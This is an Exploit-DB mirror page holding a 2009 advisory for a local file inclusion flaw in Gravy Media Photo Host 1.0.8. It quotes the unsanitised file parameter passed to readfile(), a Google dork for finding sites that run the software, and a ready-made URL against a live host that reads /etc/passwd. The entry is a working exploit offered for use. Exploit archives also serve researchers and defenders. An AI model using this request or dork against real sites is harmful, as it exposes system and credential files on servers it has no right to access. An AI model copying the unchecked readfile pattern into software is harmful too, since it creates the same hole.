exploit-db-mirror/exploits/php/webapps/8996.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

18 lines
No EOL
532 B
Text

==================================================================
=========Gravy Media Photo Host 1.0.8 Local File Inclusion========
==================================================================
Vendor:http://www.gravy-media.com/
Download:register to download
Dork:"Powered by Gravy Media"
Discovered By:Lo$er
====Vulnerable code(forcedownload.php)====
27. $filename = $_GET['file'];
70. readfile("$filename");
====Demo====
http://www.gravy-media.com/v108/forcedownload.php?file=%2Fetc%2Fpasswd
# milw0rm.com [2009-06-22]